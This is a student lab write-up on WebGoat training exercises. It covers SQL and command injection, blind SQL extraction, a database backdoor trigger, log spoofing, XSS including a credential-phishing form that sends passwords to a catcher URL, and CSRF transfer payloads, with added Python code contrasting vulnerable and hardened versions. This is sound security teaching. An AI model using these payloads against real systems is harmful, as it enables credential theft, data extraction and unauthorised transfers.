2018-2019-2 Network Countermeasures Technology 20165301 Exp9 Web Security Basics

Answers to the basic questions

  • 1. How does a SQL injection attack work, and how is it defended against?

    • SQL injection inserts SQL fragments into a web form field, a URL query string or a page request parameter so that the server is tricked into executing SQL written by the attacker instead of the statement the developer intended.
    • The attack exploits flaws in how the application builds and runs its SQL on the target server: user input is not validated before being concatenated into a dynamically generated statement, which is the main reason injection succeeds. For example, typing characters such as ', -- or # into the user-name or password field lets the attacker close the quoted string early, comment out the rest of the statement and append an always-true condition, so the login succeeds without valid credentials.
    • Defence: turn off or remove form pages that do not need interactive submission;
      filter the input at every injection point (for example with regular expressions) and, better, pass input to the database as bound parameters of a prepared statement so that it is never parsed as SQL;
      do not leave backup files on the server, since they can leak source code or contain vulnerabilities that give the attacker a starting point;
      encrypt sensitive database contents so that data which does leak is not directly usable.
  • 2. How does an XSS attack work, and how is it defended against?
    • Principle: XSS (cross-site scripting). The attacker exploits a site that does not adequately filter user input and echoes that input into pages seen by other users. Because the victim's browser trusts the target server, a malicious script (an HTML tag or JavaScript code) injected into a page served by that server runs in the victim's browser with the site's privileges, for example to read the user's cookie and then act under the user's identity.
    • Defence:
      • Users: raise awareness and do not enter personal information such as user names and passwords into pages that look suspicious.
      • Web developers:
        • Filter input parameters and URLs.
        • Encode or escape potentially dangerous characters in data before writing it into the output page.
  • 3. How does a CSRF attack work, and how is it defended against?
    • Principle:
      • CSRF: cross-site request forgery.
      • CSRF is a forged request made with a real login. Since sessions are almost always carried in a cookie, the session is the only evidence the server has of who the user is; the attacker does not need the victim's account name or password, because the browser attaches the session cookie to every request it sends to the site, including requests that the attacker's page caused. Whoever can make the browser send a request with that cookie is, from the server's point of view, the victim.
      • Typical flow: the user logs in to site A with user name and password; after validation, A returns a cookie, and from then on the browser's requests to A succeed normally. Before logging out of A, the user visits site B, which returns attack code that makes the browser request a URL on A. The browser sends that request to A with A's cookie attached, and A, unable to tell it from a legitimate request, carries out the action.
    • Defence:
      • Require an anti-CSRF token with each state-changing request.
      • Verify the Referer header.
      • Add an extra random verification step (such as a CAPTCHA) on sensitive operations.
      • Restrict the domain of the cookie.

Practice record

Installing WebGoat

  • Download the installation package.
  • Run netstat -tupln | grep 8080 to check whether port 8080 is already in use; if it is, terminate the process occupying it with kill and that process's PID.
  • Start WebGoat from the command line with java -jar webgoat-container-7.0.1-war-exec.jar

  • In Chrome open localhost:8080/WebGoat and log in with the default user name and password to start the exercises.

SQL injection attacks

  • Right-click the page and choose Inspect Element to edit the page source. Find the option in the drop-down list, right-click it, choose Edit As HTML and append "& netstat -an & ipconfig" to its value. (This first exercise is WebGoat's Command Injection lesson rather than SQL injection: & is a shell command separator, so the appended commands run on the server after the legitimate one.)

  • Click View: the response shows the server's network port usage and IP configuration, proving the injected commands were executed. Attack successful!

Numeric SQL Injection

  • Concept: inject numeric data (for example an always-true expression) into a numeric field to achieve the injection.

  • Principle: inject characters into the station field so that they combine with the original statement into a new SQL statement, for example:
    SELECT * FROM weather_data WHERE station = [station]

  • Objective: view all weather data through SQL injection.

  • Method:

    • Right-click the page, choose Inspect Element, and change the value attribute of the selected city's option from its station number to that number followed by or 1=1. Because the field is numeric there is no quote to close; the condition is appended as-is.
  • The weather for every city is displayed; the attack is successful!

Log Spoofing

  • Concept: deceive the reader of a log file by inserting crafted text (or a script) into it.

  • Principle: forged entries fool the human eye reading the log; an attacker can use this to cover their tracks.

  • Objective: the grey area shows the web server's log. The aim is to make the log record a "Login Succeeded" entry for the user name admin.

  • Method:

    • Use a URL-encoded carriage return (%0d) and line feed (%0a): enter the user name ctf%0d%0aLogin Succeeded for username: admin. The server decodes the two characters to CR LF, so the failed-login entry for ctf is followed by what looks like a separate, successful entry for admin.

    • An attacker can also insert a malicious script into the log this way; when the administrator views the log in a browser, the script runs. For example, entering the user name admin <script>alert(document.cookie)</script> pops up the administrator's cookie.
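The following is an added example, not code from the report or from WebGoat. It decodes the lesson's %0d%0a payload (constructed here to match it), shows how a log writer that copies the user name verbatim ends up with two entries, and adds the two hardening steps a practitioner would want: neutralising control characters at write time, and HTML-escaping when the log is rendered for a browser. The log format and the detection helper are assumptions for illustration.

```python
# Added example, not WebGoat's code: how the CRLF payload from the Log Spoofing
# lesson forges a log entry, plus two hardening steps (neutralise control
# characters when writing, HTML-escape when viewing). RAW_USERNAME is a
# constructed request value that matches the lesson payload.
import html
import re
import urllib.parse

# %0d%0a decodes to CR LF; the text after it is meant to read as a new entry
RAW_USERNAME = "ctf%0d%0aLogin Succeeded for username: admin"

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def decode_param(raw):
    """What the server sees after URL-decoding the form field."""
    return urllib.parse.unquote(raw)


def log_entry_vulnerable(username):
    # Writes the user-controlled value verbatim, so CR LF ends the entry early.
    return "Login failed for username: " + username


def neutralise(value):
    # Replace every control character with a visible escape so nothing the
    # user sends can terminate or reshape the log entry.
    return CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group()), value)


def log_entry_safe(username):
    return "Login failed for username: " + neutralise(username)


def render_log_for_browser(entries):
    # The admin reads the log in a browser, so a payload such as
    # admin <script>alert(document.cookie)</script> must also be HTML-escaped.
    return "<br>".join(html.escape(e, quote=True) for e in entries)


def count_entries(log_text):
    """How many entries a log reader would see in the text."""
    return len(log_text.splitlines())


def looks_spoofed(username):
    """Detection: a user name never legitimately contains control characters."""
    return CONTROL_CHARS.search(username) is not None


if __name__ == "__main__":
    user = decode_param(RAW_USERNAME)
    print(count_entries(log_entry_vulnerable(user)))  # 2: the forged line stands alone
    print(count_entries(log_entry_safe(user)))        # 1
    print(log_entry_safe(user))
    print(render_log_for_browser(
        [log_entry_vulnerable("admin <script>alert(document.cookie)</script>")]))
```

Neutralising at write time keeps one request equal to one log line, which is what makes the log trustworthy again; the HTML escaping handles the second variant of the lesson, where the log viewer itself is the injection sink.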

LAB: SQL Injection

  • Stage 1: String SQL Injection
  • Principle: bypass authentication by injecting a string.

  • Method:

    • Right-click the page, choose Inspect Element, and raise the maxlength attribute of the password field to 18 so that the payload fits.

    • Log in as the user Neville (the admin) with the password hello' or '1' = '1
  • Stage 3: Numeric SQL Injection
  • Principle: inject numeric data to bypass authorisation and view the boss's profile from an ordinary employee's account.

  • Method:

    • Log in as Larry with the password larry, then click ViewProfile to view the user's information.

  • Right-click the page and choose Inspect Element: the employee list is indexed by employee ID, and the server apparently displays the first row returned by the query.

  • Reasoning about the organisation, the boss should have the highest salary, so change the employee ID value to 101 or 1=1 order by salary desc; the boss's record then becomes the first row of the result.
  • Attack successful.

String SQL Injection

  • Concept: bypass authentication by injecting a string.

  • Principle: construct an injection string around the following query.

SELECT * FROM user_data WHERE last_name = '?'

  • Objective: the form below lets users view their credit-card numbers. Try to display all credit-card information through SQL injection. The user name to try is "Smith".

  • Method:

    • Enter the user name Smith' or 1=1-- (both Smith and 1=1 become conditions of the query; 1=1 is always true, so every row of the table matches, and -- comments out the trailing quote).
    • The credit-card numbers of all users are returned; attack successful!
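The following is an added example, not code from the report or from WebGoat. It reproduces the flaw behind basic question 1 and the Numeric, Lab Stage 1, Lab Stage 3 and String SQL Injection lessons above (a query built by string concatenation) and puts the parameterised fix beside it, so the same payloads can be run against both. SQLite stands in for the lesson database; the table and column names follow the lesson text, the rows are constructed.

```python
# Added example, not WebGoat's code: the string-concatenation flaw behind the
# WebGoat SQL injection lessons next to the parameterised fix. SQLite stands in
# for the lesson database; table/column names follow the lesson text, the rows
# are constructed.
import sqlite3


def make_db():
    """In-memory database seeded with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE user_data (userid INTEGER, first_name TEXT,
                                last_name TEXT, cc_number TEXT);
        INSERT INTO user_data VALUES (101, 'Joe',  'Snow',  '987654321');
        INSERT INTO user_data VALUES (102, 'John', 'Smith', '2435600002222');
        INSERT INTO user_data VALUES (103, 'Jane', 'Plane', '123456789');
        CREATE TABLE employee (userid INTEGER, name TEXT, password TEXT,
                               salary INTEGER);
        INSERT INTO employee VALUES (101, 'Larry',   'larry',   55000);
        INSERT INTO employee VALUES (102, 'Moe',     'moe',     140000);
        INSERT INTO employee VALUES (112, 'Neville', 'neville', 450000);
        """
    )
    return conn


# --- vulnerable: input is spliced into the SQL text -------------------------

def cards_vulnerable(conn, last_name):
    # String SQL Injection lesson: Smith' or 1=1-- closes the quote, adds a
    # tautology and comments out the trailing quote.
    sql = ("SELECT first_name, last_name, cc_number FROM user_data "
           "WHERE last_name = '" + last_name + "'")
    return conn.execute(sql).fetchall()


def login_vulnerable(conn, name, password):
    # Lab stage 1: the password hello' or '1' = '1 makes the WHERE clause true.
    sql = ("SELECT userid FROM employee WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def profile_vulnerable(conn, employee_id):
    # Numeric lessons: no quote to close, so 101 or 1=1 order by salary desc
    # goes straight in and the highest-paid row comes back first.
    sql = ("SELECT userid, name, salary FROM employee WHERE userid = "
           + employee_id)
    return conn.execute(sql).fetchone()


# --- hardened: the same queries with bound parameters -----------------------

def cards_safe(conn, last_name):
    return conn.execute(
        "SELECT first_name, last_name, cc_number FROM user_data "
        "WHERE last_name = ?", (last_name,)).fetchall()


def login_safe(conn, name, password):
    row = conn.execute(
        "SELECT userid FROM employee WHERE name = ? AND password = ?",
        (name, password)).fetchone()
    return row is not None


def profile_safe(conn, employee_id):
    # Validate the shape first, then bind: the value can only ever be a number.
    if not employee_id.isdigit():
        return None
    return conn.execute(
        "SELECT userid, name, salary FROM employee WHERE userid = ?",
        (int(employee_id),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(cards_vulnerable(db, "Smith' or 1=1--"))                  # every card
    print(cards_safe(db, "Smith' or 1=1--"))                        # []
    print(login_vulnerable(db, "Neville", "hello' or '1' = '1"))    # True
    print(login_safe(db, "Neville", "hello' or '1' = '1"))          # False
    print(profile_vulnerable(db, "101 or 1=1 order by salary desc"))  # Neville's row
    print(profile_safe(db, "101 or 1=1 order by salary desc"))      # None
```

With bound parameters the payload is compared as a literal last name, password or ID and simply matches nothing; the numeric case additionally whitelists the input's shape before it reaches the database, which is the "filter at the injection point" step from the answer to question 1.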

Database Backdoors

  • Principle: a database usually serves as the back end of a web application and as its storage medium. It can also be used to store malicious logic, such as triggers. A trigger makes the DBMS run another database operation (insert, select, update or delete) when a given event occurs. For example, an attacker can create a trigger that, whenever a new user is created, sets that user's e-mail address to the attacker's.

  • Objective: exploit the vulnerable query to create a trigger. Because the database WebGoat uses does not support triggers, this lesson cannot actually be completed. Our Login ID is 101.

  • Method:

    • Enter 101 to get that user's information. The input is not validated, so SQL injection is straightforward.

    • Enter the injection 101; update employee set salary=18000 and both statements are executed (stacked queries).

    • Enter 101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]'WHERE userid = NEW.userid
      • BEFORE/AFTER specifies when the trigger fires, before or after the triggering event.
      • FOR EACH ROW means the trigger fires once for every row affected by the triggering statement.
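The following is an added example, not code from the report or from WebGoat. Since the lesson cannot be completed in WebGoat, it reproduces the stacked-query injection on SQLite, where the planted trigger actually takes effect: a view-profile handler that runs the user's input as a script, the two lesson payloads, and the parameterised version that rejects them. The table employee, login ID 101 and the trigger name myBackDoor follow the lesson; the rows and the attacker address are constructed. One adaptation: the lesson payload uses BEFORE INSERT, but in SQLite the new row does not exist yet at that point, so the backdoor is written as AFTER INSERT.

```python
# Added example, not WebGoat's code: stacked-query injection from the Database
# Backdoors lesson reproduced on SQLite, including the planted trigger. Table
# employee, login ID 101 and the trigger name myBackDoor follow the lesson; the
# rows and the attacker address are constructed. SQLite needs AFTER INSERT for
# the trigger's UPDATE to see the new row, where the lesson payload uses BEFORE.
import sqlite3

ATTACKER_EMAIL = "attacker@example.invalid"   # constructed placeholder


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE employee (userid INTEGER PRIMARY KEY, name TEXT,
                               email TEXT, salary INTEGER);
        INSERT INTO employee VALUES (101, 'Larry', 'larry@example.invalid', 55000);
        INSERT INTO employee VALUES (102, 'Moe',   'moe@example.invalid',   60000);
        """
    )
    return conn


def view_profile_vulnerable(conn, login_id):
    """The lesson's flaw: login_id is spliced into the SQL and the text is run
    as a script, so a ';' in the input appends a second statement."""
    sql = "SELECT userid, name, email, salary FROM employee WHERE userid = " + login_id
    conn.executescript(sql)          # runs every statement in the string
    conn.commit()


def view_profile_safe(conn, login_id):
    """Bound parameter: the whole input is one integer value or it is rejected."""
    try:
        uid = int(login_id)
    except ValueError:
        return None
    return conn.execute(
        "SELECT userid, name, email, salary FROM employee WHERE userid = ?",
        (uid,)).fetchone()


def salary_of(conn, userid):
    return conn.execute("SELECT salary FROM employee WHERE userid = ?",
                        (userid,)).fetchone()[0]


def email_of(conn, userid):
    return conn.execute("SELECT email FROM employee WHERE userid = ?",
                        (userid,)).fetchone()[0]


def trigger_names(conn):
    """Defender's check: triggers that nobody deployed are the backdoor's footprint."""
    return [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='trigger'")]


# The two payloads from the lesson (the second adapted to SQLite's AFTER INSERT)
PAYLOAD_UPDATE = "101; UPDATE employee SET salary=18000"
PAYLOAD_TRIGGER = ("101; CREATE TRIGGER myBackDoor AFTER INSERT ON employee FOR EACH ROW "
                   "BEGIN UPDATE employee SET email='" + ATTACKER_EMAIL +
                   "' WHERE userid = NEW.userid; END")


def demo():
    conn = make_db()
    view_profile_vulnerable(conn, PAYLOAD_UPDATE)     # every salary is now 18000
    view_profile_vulnerable(conn, PAYLOAD_TRIGGER)    # backdoor planted
    conn.execute("INSERT INTO employee VALUES (103, 'Curly', 'curly@example.invalid', 50000)")
    return salary_of(conn, 102), email_of(conn, 103), trigger_names(conn)


if __name__ == "__main__":
    print(demo())   # (18000, 'attacker@example.invalid', ['myBackDoor'])
```

The third element of demo() is the point for the defender: the stacked UPDATE is a one-off, but the trigger keeps rewriting every future user's e-mail address until someone lists the database's triggers and notices one that was never deployed.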

Blind Numeric SQL Injection

  • Principle: some SQL injections return no explicit data; the attacker learns only whether a condition is true or false, and must make the most of the existing query by constructing subqueries around it.

  • Objective: the form accepts an account number and reports whether it is valid. Use that true/false response to probe other entries in the database: find the value of the pin field in the pins table for the row whose cc_number is 1111222233334444. The pin field is of type int. Enter the value found and submit it to pass the lesson.

  • Method:

    • The server page gives only two responses, account valid or account invalid, so the PIN cannot simply be queried. But the back-end query is SELECT * FROM user_data WHERE userid=accountNumber;

    • If the query returns the account's row, the page reports the account valid, otherwise invalid. With the AND operator we can append extra conditions: if the added condition is also true, the account is reported valid; otherwise it is reported invalid.

    • For example, entering 101 AND 1=1 makes both conditions hold, so the page reports the account valid.

    • Entering 101 AND 1=2 makes the second condition fail, so the page reports the account invalid.

    • Build a more complex condition on the second half of the statement, for example 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000); if the page says invalid, the PIN is 5000 or less. Halving the remaining interval each time (binary search) eventually gives pin = 2364.

Blind String SQL Injection

  • Principle: as with blind numeric injection, some SQL injections return no explicit data; the attacker can only judge by a condition being true or false and must build subqueries around the existing query.

  • Objective: find the value of the pin field in the pins table for the row whose cc_number is 4321432143214321. The pin field is a varchar. Enter the string found (mind spelling and capitalisation) and submit it to pass the lesson.

  • Method:

    • The same as blind numeric injection, except that the numeric comparison is replaced by a string comparison.
    • For example, 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'M' ); takes the first character of the pin and tests whether it sorts before the letter 'M'.
    • The SUBSTRING syntax is SUBSTRING(STRING, START, LENGTH).
    • Binary search character by character finally gives the pin Jill.
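The following is an added example, not code from the report or from WebGoat, and it serves both blind-injection lessons above. It models the vulnerable account-check endpoint as a boolean oracle on SQLite and drives it with the binary search the report describes by hand, first for the integer PIN and then, after learning the length, for each character of the string PIN. The user_data and pins rows are constructed to hold the lessons' answers (2364 and Jill); SQLite's SUBSTR() and UNICODE() play the role of the lesson's SUBSTRING() comparison, and the request counter is an addition to show how few responses the attack needs.

```python
# Added example, not WebGoat's code: the boolean oracle from the two blind SQL
# injection lessons, driven by a binary search so the PIN is recovered without
# the page ever returning data. SQLite stands in for the lesson database; the
# user_data and pins rows are constructed to hold the lessons' answers.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE user_data (userid INTEGER, first_name TEXT, last_name TEXT);
        INSERT INTO user_data VALUES (101, 'Joe', 'Snow');
        CREATE TABLE pins (cc_number TEXT, pin INTEGER, name TEXT);
        INSERT INTO pins VALUES ('1111222233334444', 2364, 'Joe');
        INSERT INTO pins VALUES ('4321432143214321', 0,    'Jill');
        """
    )
    return conn


class Oracle:
    """The vulnerable endpoint: it tells the caller only valid / invalid."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def account_is_valid(self, account_number):
        self.requests += 1
        sql = "SELECT * FROM user_data WHERE userid = " + account_number  # the flaw
        return self.conn.execute(sql).fetchone() is not None

    def ask(self, condition):
        # Attacker side: AND the probe onto an account known to be valid (101).
        return self.account_is_valid("101 AND (" + condition + ")")


def extract_int(oracle, subquery, lo=0, hi=10000):
    """Binary search on (subquery) > mid; invariant: lo <= value <= hi."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask("(%s) > %d" % (subquery, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, subquery, max_len=64):
    """Learn the length, then each character by binary search over printable
    code points (the lesson does the same with SUBSTRING(...) < 'M')."""
    length = extract_int(oracle, "SELECT LENGTH((%s))" % subquery, 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        probe = "SELECT UNICODE(SUBSTR((%s), %d, 1))" % (subquery, pos)
        chars.append(chr(extract_int(oracle, probe, 32, 126)))
    return "".join(chars)


NUMERIC_TARGET = "SELECT pin FROM pins WHERE cc_number='1111222233334444'"
STRING_TARGET = "SELECT name FROM pins WHERE cc_number='4321432143214321'"

if __name__ == "__main__":
    o = Oracle(make_db())
    print(o.ask("1=1"), o.ask("1=2"))           # True False
    print(extract_int(o, NUMERIC_TARGET))       # 2364
    print(extract_string(o, STRING_TARGET))     # Jill
    print(o.requests, "requests in total")
```

Each integer in [0, 10000) costs at most 14 yes/no answers and each character at most 7, which is why a "valid/invalid" message is enough to empty a table; the fix is the same bound parameter as in the earlier lessons, after which the probe is just an account number that does not exist.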

XSS attacks (Cross-Site Scripting)

Cross-site scripting hijacks the user's browser through HTML injection: the attacker controls the HTML content the user is currently viewing and can simulate the user's actions. The exercise here is an attack that captures the user name and password.

Phishing with XSS
  • Click Cross-Site Scripting (XSS) > Phishing with XSS.

  • XSS lets the attacker add elements to an existing page. The attack has two parts:
    • a form that the victim fills in;
    • a script that sends the collected information to the attacker (here, WebGoat's catcher endpoint, which records it).
  • Write a script that reads the user name and password the victim types into the form and sends them to the WebGoat catcher that collects them.

  • Write a form with user-name and password input fields.

<!-- script; the first </form> closes the lesson page's own search form so the injected form stands alone -->
</form>
<script>
    function hack(){
        var XSSImage = new Image();
        // the browser "loads" this image URL, sending the captured values to the catcher
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value;
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    }
</script>
<!-- form -->
<form name="phish">
<br>
<br>
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name="pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

Stored XSS Attacks

  • Enter any text in the Title field and, in the message field, enter <script>alert("I am 20165301ctf. You've been attacked!!!");</script>. The script is saved with the message and runs for every user who opens it.

Reflected XSS Attacks

  • Enter the code <script>alert("You've been attacked!!!");</script> in the input field; as soon as Purchase is clicked the page echoes the input back and the alert appears.
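The following is an added example, not code from the report or from WebGoat. It applies the developer-side defence from basic question 2 (encode potentially dangerous characters before output) to the two sinks exercised by the Stored and Reflected XSS lessons, using the lessons' own payloads, and adds the one case a practitioner needs to know about: in an href attribute, escaping alone does not stop javascript: URLs, so the scheme must be checked as well. The two page templates are constructed for illustration.

```python
# Added example, not WebGoat's code: the output-encoding defence for the Stored
# and Reflected XSS lessons, with a URL check for the href context where
# escaping alone is not enough. The page templates are constructed; the payload
# strings are the ones used in the lessons.
import html
import re
from urllib.parse import urlsplit

STORED_PAYLOAD = '<script>alert("I am 20165301ctf. You\'ve been attacked!!!");</script>'
REFLECTED_PAYLOAD = '<script>alert("You\'ve been attacked!!!");</script>'

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_message_vulnerable(title, message):
    # Stored XSS: the message board writes the saved text into the page as-is.
    return "<div class=\"msg\"><h3>%s</h3><p>%s</p></div>" % (title, message)


def render_message_safe(title, message):
    # Escape at output time for the HTML text context: < > & " ' become entities.
    return "<div class=\"msg\"><h3>%s</h3><p>%s</p></div>" % (
        html.escape(title, quote=True), html.escape(message, quote=True))


def render_search_vulnerable(term):
    # Reflected XSS: the request parameter is echoed straight back.
    return "<p>Results for: %s</p>" % term


def render_search_safe(term):
    return "<p>Results for: %s</p>" % html.escape(term, quote=True)


def safe_href(url):
    """Attribute/URL context: HTML-escaping 'javascript:alert(1)' changes
    nothing, so the scheme is whitelisted before the value goes into href.
    Returns None when the URL must not be emitted."""
    url = url.strip()
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return None
    return html.escape(url, quote=True)


def executes_script(fragment):
    """Check: does the rendered HTML still contain a live <script> tag?"""
    return SCRIPT_TAG.search(fragment) is not None


if __name__ == "__main__":
    print(executes_script(render_message_vulnerable("t", STORED_PAYLOAD)))  # True
    print(executes_script(render_message_safe("t", STORED_PAYLOAD)))        # False
    print(render_search_safe(REFLECTED_PAYLOAD))
    print(safe_href("javascript:alert(1)"), safe_href("http://localhost:8080/WebGoat"))
```

The escaping is done where the data leaves the application, not where it arrives, because the same stored message may later be written into an attribute, a script block or a URL, and each of those contexts needs its own encoding; safe_href shows the URL context, where the right answer is a scheme whitelist rather than more entities.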

CSRF attacks

Cross Site Request Forgery (CSRF)
  • Read the src and menu values in the Parameters panel on the right of the page: 267 and 900.
  • Enter anything in Title, and in the Message field enter <img src="http://localhost:8080/WebGoat/attack?Screen=267&menu=900&transferFunds=5000" width="1" height="1" />. The URL is embedded as an image so it is invisible to other users (the 1x1 pixel size hides it); as soon as a user's browser loads the message it requests the image URL with the user's cookie attached, which triggers the transfer. Click Submit.
  • A message named by the title appears in the Message List. Clicking it makes the page load and display the message, and the user's 5000 is transferred away, achieving the CSRF attack. The task shows as completed in the left panel.
CSRF Prompt By-Pass
  • The src and menu values in the Parameters panel are 270 and 900. Enter the student number in Title and the following in the Message field:
<iframe src="attack?Screen=270&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=270&menu=900&transferFunds=CONFIRM"> </iframe>
  • A link named by the title appears in the Message List; opening it completes the attack, because the first iframe requests the transfer and the second submits the confirmation step the page would otherwise ask the user for. The task shows as completed in the left panel.
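The following is an added example, not code from the report or from WebGoat. It implements two of the defences listed under basic question 3, a per-session anti-CSRF token and a Referer check, in a transferFunds handler, and feeds it three requests: the GET a browser sends when it loads the lesson's 1x1 <img>, a forged POST from an attacker's page, and a legitimate form post. The request dictionaries, the server key and the balances are constructed for the demonstration; JSESSIONID is assumed as the session cookie name.

```python
# Added example, not WebGoat's code: the anti-CSRF token and Referer checks
# listed among the CSRF defences, applied to a transferFunds handler and
# exercised with the forged <img> request from the lesson, a forged cross-site
# POST, and a legitimate form post. Request model, key and balances are constructed.
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost:8080"        # "site A" from the basic-questions answer
SERVER_KEY = secrets.token_bytes(32)         # per-deployment secret, constructed


def issue_token(session_id):
    """Token bound to the session; the real form carries it in a hidden field."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_ok(session_id, presented):
    return presented is not None and hmac.compare_digest(issue_token(session_id), presented)


def same_origin(referer):
    """Defence in depth: a missing or foreign Referer on a state change is rejected."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def transfer_funds(request, balances):
    """request: {'method', 'cookies', 'headers', 'params'}; returns a status line.
    The browser attaches the session cookie by itself, which is why CSRF works;
    the token is not a cookie, so a third-party page cannot supply it."""
    sid = request["cookies"].get("JSESSIONID")
    if sid is None or sid not in balances:
        return "401 not logged in"
    if request["method"] != "POST":
        return "405 state change requires POST"
    if not same_origin(request["headers"].get("Referer")):
        return "403 cross-site request"
    if not token_ok(sid, request["params"].get("csrf_token")):
        return "403 missing or wrong CSRF token"
    amount = int(request["params"]["transferFunds"])
    balances[sid] -= amount
    return "200 transferred %d" % amount


def forged_img_request(sid):
    """What the browser sends when it loads the lesson's
    <img src=".../attack?Screen=267&menu=900&transferFunds=5000">:
    a GET with the cookie attached and no token. The Referer is the
    WebGoat page itself, because the message is stored on the site."""
    return {"method": "GET", "cookies": {"JSESSIONID": sid},
            "headers": {"Referer": SITE_ORIGIN + "/WebGoat/attack?Screen=267&menu=900"},
            "params": {"transferFunds": "5000"}}


def forged_post_request(sid):
    """An auto-submitting form on an attacker's page: POST, cookie attached,
    foreign Referer, and no way to know the token."""
    return {"method": "POST", "cookies": {"JSESSIONID": sid},
            "headers": {"Referer": "http://attacker.example.invalid/page"},
            "params": {"transferFunds": "5000"}}


def legitimate_request(sid):
    return {"method": "POST", "cookies": {"JSESSIONID": sid},
            "headers": {"Referer": SITE_ORIGIN + "/WebGoat/transfer"},
            "params": {"transferFunds": "5000", "csrf_token": issue_token(sid)}}


def demo():
    sid = "victim-session"
    balances = {sid: 10000}
    img = transfer_funds(forged_img_request(sid), balances)
    post = transfer_funds(forged_post_request(sid), balances)
    real = transfer_funds(legitimate_request(sid), balances)
    return img, post, real, balances[sid]


if __name__ == "__main__":
    print(demo())
    # ('405 state change requires POST', '403 cross-site request',
    #  '200 transferred 5000', 5000)
```

Note that the Referer check alone would not have stopped the lesson's attack: the image lives in a message stored on WebGoat itself, so its Referer is same-origin. Refusing GET for state changes and requiring the token are what defeat it, which is why the token is the primary control and the Referer check only backup; a SameSite attribute on the session cookie is the modern complement to the "set the cookie domain" item in the list above.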

Experiment summary and reflections

There was so much content in this experiment... WebGoat is really impressive.

Source: www.cnblogs.com/CTF5301/p/10927194.html